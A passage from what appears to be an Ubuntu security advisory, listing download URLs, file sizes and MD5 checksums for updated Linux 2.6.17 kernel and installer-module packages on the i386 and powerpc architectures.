    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    34712 2a262eb409c639c2df60bb5d2e8b8ab3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   140566 2a626811125318486f08cc22593a8092
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   143824 b66a66a374a49ae9858742e8ca3504ec
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    51752 043c1824d5f4a5aebc9281dda3bf6caa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    53176 a0f81c4a9941fb3899cd64918c9bcc28
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   131478 23ac367eed768ce78fa431765f25e725
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   138922 610a6e3c4eea7cfea5f4caa40f14d85c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   288344 8b8b4a755303cb5df01deb073e98eb3a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   290684 c278cff6601ef229921ce87636b99a5d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   103540 1c390c445cf484e97d48ae85ba21d385
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   106728 4b81b22145919aa03e8f405d049a6556
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  1737360 d9ef0a9c0c20322713639cd09f2d8526
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  1802854 ed32db3f485cabda5793dec7c0ed39c4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-386_2.6.17.1-10.34_i386.deb
      Size/MD5:   919606 2e269ec669141505976076f3aa19a691
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-generic_2.6.17.1-10.34_i386.deb
      Size/MD5:   908746 ec2770850d4038d804419540d10a3663
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-server-bigiron_2.6.17.1-10.34_i386.deb
      Size/MD5:   909176 53aee73b705e84ca50ee0cc84114e357
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-server_2.6.17.1-10.34_i386.deb
      Size/MD5:   915122 d8ce253ad0dcd09544b7ac30e00e0f0f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10_2.6.17.1-10.34_i386.deb
      Size/MD5:  7421744 2c8e74bffb73e6c76484fb7d46e97201
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-386_2.6.17.1-10.34_i386.deb
      Size/MD5: 22849876 55806bf0f773b3deb38525a74eb03398
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-generic_2.6.17.1-10.34_i386.deb
      Size/MD5: 22983128 694622a2ffbec84d25d956c059577e88
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-server-bigiron_2.6.17.1-10.34_i386.deb
      Size/MD5: 24081168 da82c2550269af26474b3e1a9e09a0c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-server_2.6.17.1-10.34_i386.deb
      Size/MD5: 23580646 094b6bdebb6dd732fdc144c875e78363
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-386_2.6.17.1-10.34_i386.deb
      Size/MD5:  1959580 e5f893dda524cdded61636c09a258db6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-generic_2.6.17.1-10.34_i386.deb
      Size/MD5:  2027344 64b3620068f3d1f50f35cd60b27d4494
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-server-bigiron_2.6.17.1-10.34_i386.deb
      Size/MD5:  2065094 f55bc559c69b2fb0c020197ab26b39b7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-server_2.6.17.1-10.34_i386.deb
      Size/MD5:  2027486 5d844abc4a39ddc694778a84aedf3e67
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-10.34_i386.deb
      Size/MD5: 21529604 74dc7e2cd2c248a4c61066211ffcf82f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-10.34_i386.deb
      Size/MD5:  1769870 d1b579e4018361369ee5fa8162af09cc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    15376 d27b5598819394550d9530619644230e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    15736 f832011c15a9222c308171bd5579e527
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   253318 e36a7794eb2fbcb050cc9a117ad55279
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   263870 70ff96d3691eb15534f4f488b412efb3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   220366 b568a828271789e89c4ceea828e3a095
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   227606 1989f519d80e0ecef4ce0fc7dabeeceb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  1048406 bb24a0173d3d32214e002acd962e1167
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  1048488 86f75042f2d53c95e419ca27c9800406
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  2092412 055f9d88b1a1955946c96ab507321b35
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  2142958 d7e14dde3b92adf1c95485cdbdff7d82
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   156876 4ba2c65839a1770112c57a50fa63a63e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   152152 f83a16ab22cda042a2a300cce763741a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     9176 9c506c43a943269b90b9b14fd5dee98b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     9654 3807473bcd5fac1465a7f01d71eb591c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    79222 0235d29eafb5cfaaf290a960abc58911
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    81764 ac62f0fe92e3da7b41ed5e691ba96130
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    55088 46583483b69aad2e5754fbad359479c0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    56732 b3d9657cb6ce54f81a3c12b3d669202f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    34486 24792c0abbc16c627eeb9baf969668d8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    35410 0e4dc686ed089c3e78ecaec2cf7de396
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    85878 d8eef148990752d55f68dbab1fa85bb0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    87436 3300c53167c4aa82d51acb7bba4f2e6d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     6084 690c5377e1ef02a6a3b7e6bc38676e66
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     6096 1f2bcc277c37a04d361c7856fda61499
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     8608 dd702178be97210524fa3e5fcd6c7a97
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     8900 d2c0840c89faea4cedec3e5b62c7afd7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    52682 6d117fe9beab29dd9eb4f6043cef241d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    55112 707a723c8adae1cbbe98a2ad1ead1e17
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   129982 233eb2bb9b3b8e125239f95213048e20
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   132966 717e7a930553eff7f2b9c63eb48601e1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    99834 4639c540bf63b1ad2fc745e4289d3e34
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   101152 7b18b4437d266a799b1a8d07a991294a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    79572 c8991b8f67f740874b48609fb3cd0941
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    80938 9c663ac53a2294a078e887d79f6fe6f1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  1394964 2714ebe9a864024e73dacef0d30bfc06
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:  1398130 a73ea27fe7f87e501e766739db88cb18
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    69150 02717af7ef1142329c4616911b19e124
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    71088 32cf7b2ee8bf193ba1076689793d2f8c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    11424 c2c62afd654e0181e53f357479356059
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    11980 3b5df7818a4786715e9cf213341f288a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    62482 b2ae5b073f7824073b8d68df9eef5314
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    63804 4c6245b5a0e083671008b41a8989d34f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    36008 80bab6539605c8e4c06056b84e8aa24b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    36520 f27383fde725fdb97d7dcdcab684cfcb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   127290 05f888c555f01fff6d800983cf673477
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   131328 f47f6d8bf0a40b34c60ce1f266786f02
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    46804 c7edde1dcfcb834aaf916abba8980cd1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    47564 f672cd882f13e7507d33dded67921a3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   311896 cfcca6f3ae1634cf3ca390c110766037
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   318712 a5e9486a1fcd7292f0660c6975f386a1

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    23238 59bb5e8c465486eb97831254db942e82
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    26082 19e9e8505a0a88d6300cb145202691af
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    48584 0b724c82b3713442f323605ae78fc287
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    52040 061a45c464bda94e615e767da57a74ce
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:     2326 a9803b9c1bf09e2f0b347918ca62f897
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:     2516 bf7dc0c283765514dc6280ba402116ec
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    39044 70d773706d31b1467e57feaa2b34bb9b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    43076 a62c49ab5b2cc3374b254005a5de2d83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   111342 8acf46a6abf09315ab9774847a8111be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   122114 afb83848302cc04b28de9a0aa6178c0e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    40402 515c50d7d86ea437becf1820aadf4db8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    46228 8685bacb3856ee7118865c3a8e199684
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    28064 06c555ed61f17ae8119fbb249d57b1b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    29046 dca6ab3b96b0958bb9bc37c6d026b162
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   209742 964c1be14e97da83097a9b4607d8deba
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   225686 f7b9766d15b43c883e8fdedb4b7a6ef1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    44594 1f9c480ef48b013337d08427f1421a48
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    40178 c96a59b3b44a29d3a9e734f3cf573c2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:     1958 273910d71cba3232778875b4679c7098
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:     2236 22d4b1d93d8b5c35ce67234f53b9b556
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    79292 7b84311ec29452b346f4bbf37e0ecda6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    86602 0bd6c05322189405239656c3ef825564
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   110266 30da63c0959dedc15e6e00e0b63d5d49
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   127804 70d06bd9987f42cd990cfbad43f29080
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    55678 c251ad6ccf5a6a69670b6c76a49e6630
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    61926 cc5d7b79fc65bed03efe6189c3cae248
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   140880 83d977a7a0482ac7f7908f4301f5a636
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   158442 1a4d160f911ebe9d49e7f1fae0a8c506
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   314588 be466a6c8a551d07629ee47a16ae9bcd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   289936 e6d6bce04dc24cf3a380564637e9d75c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   113202 ceb1057269bf8d33096d623d4901efad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   116434 744ed2b331fc438cc7eb8c401676a54f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  2051178 adfb46f6b65304452146e8dae682e04f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  2771432 2c12358b04aebe2e1c8af55a57a2f8a8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-powerpc-smp_2.6.17.1-10.34_powerpc.deb
      Size/MD5:   915144 fcb1543de3f9d2ae81deb9af4b88c9f7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-powerpc64-smp_2.6.17.1-10.34_powerpc.deb
      Size/MD5:   918982 4b9bc317f4950e5a78ca38885b5be24b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-powerpc_2.6.17.1-10.34_powerpc.deb
      Size/MD5:   912596 a997c73ab1a398e837a2e93602b51971
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10_2.6.17.1-10.34_powerpc.deb
      Size/MD5:  7441616 65ee7d71ce497cd0904ca264f3d030a9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-powerpc-smp_2.6.17.1-10.34_powerpc.deb
      Size/MD5: 23024092 3a5fc7cb0f65ccebc10e1fcaac9d267b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-powerpc64-smp_2.6.17.1-10.34_powerpc.deb
      Size/MD5: 24929130 488eeb4b2268ff2767e0050b578651df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-powerpc_2.6.17.1-10.34_powerpc.deb
      Size/MD5: 22724018 76b68195313f5af3f29312ec47f72e94
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-powerpc-smp_2.6.17.1-10.34_powerpc.deb
      Size/MD5:  2041308 081e7b2111f6f280d5063f44cb7d0596
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-powerpc64-smp_2.6.17.1-10.34_powerpc.deb
      Size/MD5:  2588716 d4a0b259f7213c865d0ef1b96e94de44
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-powerpc_2.6.17.1-10.34_powerpc.deb
      Size/MD5:  1967180 2193e15e826069191a5abbc6ec7f93ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-10.34_powerpc.deb
      Size/MD5:  1728490 2adadec4a850196ecd180df2ea416417
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    17434 a4f49974ba32d71a6acc0fca4ba14ebf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    17364 5a2112800e558486023588a0cf0e63f1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   258078 aaab484e9f429fd16d7b96c82488e8d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   297928 96a26eccf8747acf966fbb9533dd3c33
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   239038 cb9a31c4e8e27c8e8913b1d291f7a20c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   266536 12501b74c4f9ecb96e993661f826934b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  1048436 93eec030eaf70eaaf7473326ffec02e9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  1048614 f11ba322edc19a7fd54f4896669efa83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  2098446 98580a49283cb6f97c05ef5869a6da0c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  2331964 8fc12717271529fe4b03f5e248d1c59f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   233866 f15a886e1898923fb534b4c1cc227ba7
